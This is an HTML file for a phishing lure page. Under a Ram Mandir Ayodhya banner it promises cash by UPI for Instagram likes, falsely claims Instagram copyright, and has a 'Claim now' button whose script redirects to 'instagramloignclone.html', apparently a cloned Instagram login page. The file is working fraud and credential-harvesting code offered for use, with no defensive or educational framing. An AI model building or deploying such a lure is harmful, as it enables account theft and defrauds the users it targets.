
<!DOCTYPE html>
<html>
<head>
    <link rel="stylesheet" type="text/css" href="style.css">
    <title>Product Page</title>
</head>
<style>
   body {
    font-family: Arial, sans-serif;
    margin: 0;
    padding: 0;
}

header {
   background-image: url("Rammandir.jpg");
   text-transform:uppercase;
   text-shadow:4px 4px 10px  black;
 
   
   background-size:cover;
   letter-spacing:1px;
    /* background-color: #333; */
    color:white;
    text-align: center;
    padding: 20px;
    height:100px;
}

.product-info {
    display: flex;
    justify-content: center;
    align-items: center;
    margin: 20px;
}

.product-image {
    flex: 1;
    padding: 20px;
    text-align: center;
}

.product-image img {
    max-width: 100%;
}

.product-details {
    flex: 1;
    padding: 20px;
}

button {
    background-color: #007BFF;
    color: #fff;
    padding: 10px 20px;
    border: none;
    cursor: pointer;
    box-shadow: rgba(0, 0, 0, 0.24) 0px 3px 8px;

}
button:hover:active {
    background-color: lightgreen;
    color: black;
   

}

footer {
    background-color: #333;
    color: #fff;
    text-align: center;
    padding: 10px;
}
#r{
   color:red;
   background-color:yellow;
}
#g{
   color:red;
   background-color:yellow;
   padding:8px;
   border-radius:10px;
}
#heading{

  color:white;
  border:black;
  padding:10px;
  border-radius:10px;
  font-weight:bold;
}
#offerdiv{
  width:70px;
  height:20px;
  background-color:#4BB543;
  color:white;
  padding:10px 40px;
  font-size:18px;
  border-radius:10px;
  font-weight:bold;
  letter-spacing:2px;
  text-transform:uppercase;
}


</style>
<body>
    <header>
        <h1>Ram Mandir Ayodhya</h1>
       <p id="heading">Monetize Instagram likes to real money #rammandir</p>
    </header>
    <section class="product-info">
        <div class="product-image">
            <img src="Rupes.jpg" alt="Product Image">
        </div>
        <div class="product-details">
          <div id="offerdiv">
        OFFERS
          </div>
            <h2> <span id="r"> 100 </span> likes =  <span id="g">10.00     </span>    Indian Rupee</h2>
            <p>Direct transfer to  UPI</p>
            <p>Click Claim</p>
            <p>OFFER ends on 24th Jan 2024</p>
            <button id="buy-button"onclick="myFunction()">Claim now</button>
        </div>
    </section>
    <footer>
        <p> All Right reserved Instagram.com 2024 </p>
    </footer>
   <script>
   function myFunction() {
     location.replace("instagramloignclone.html")
   }
   </script>
</body>

</html>
